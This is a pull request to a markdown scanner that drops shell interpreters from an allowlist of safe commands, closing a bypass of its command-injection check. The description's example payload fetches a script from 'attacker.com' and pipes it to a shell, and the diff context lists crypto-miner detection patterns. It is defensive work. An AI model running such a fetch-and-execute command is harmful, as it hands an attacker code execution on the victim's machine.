### PR TITLE
[sec-check] fix: remove shell interpreters from SAFE_CLI_COMMANDS to close isSafeCLIMatch() bypass

### DIFF
--- a/scripts/scanner.mjs
+++ b/scripts/scanner.mjs
@@ -159,12 +159,14 @@ const MALICIOUS_PATTERNS = [
   { name: 'Crypto miner reference', pattern: /\b(?:xmrig|cryptonight|stratum\+tcp|minerd|coinhive)\b/gi },
 ];
 
-// Safe CLI commands that are expected inside $() in mission code snippets
+// Safe CLI commands that are expected inside $() in mission code snippets.
+// Shell interpreters (bash, sh, zsh, ksh) are intentionally excluded: they accept
+// a -c flag and can execute arbitrary strings, which would defeat injection detection.
+// Fenced code blocks (```bash, ```sh, etc.) are already handled by CODE_FENCE_LANGS.
 const SAFE_CLI_COMMANDS = new Set([
   'kubectl', 'helm', 'jq', 'awk', 'grep', 'sed', 'cut', 'tr', 'sort',
   'uniq', 'wc', 'head', 'tail', 'cat', 'echo', 'date', 'basename',
   'dirname', 'xargs', 'find', 'ls', 'yq', 'kustomize', 'istioctl',
-  'bash', 'sh', 'zsh', 'ksh',  // shell interpreters used in markdown code blocks
   'age', 'sops', 'systemd-run',  // encryption/secret management tools in CNCF docs
 ]);
 


### PR DESCRIPTION
## Security Fix

Removes shell interpreters (`bash`, `sh`, `zsh`, `ksh`) from `SAFE_CLI_COMMANDS` in `scripts/scanner.mjs`.

### Root cause

`isSafeCLIMatch()` checks only the **first word** of each command segment against the `SAFE_CLI_COMMANDS` allowlist. Since shell interpreters were in that set, any payload where the interpreter was the first word bypassed the command injection check entirely:

```
$(bash -c "curl http://attacker.com/payload | sh")
```
→ first word = `bash` → in `SAFE_CLI_COMMANDS` → `isSafeCLIMatch()` returns `true` → alert suppressed.

### Why this is safe to remove

Markdown fenced code blocks (` ```bash `, ` ```sh `) are already handled separately by the `CODE_FENCE_LANGS.has(firstLine)` check that runs **before** `SAFE_CLI_COMMANDS` is consulted. No legitimate mission content is affected.

Fixes #2640

---
*Filed by sec-check agent (ACMM L6 — full mode)*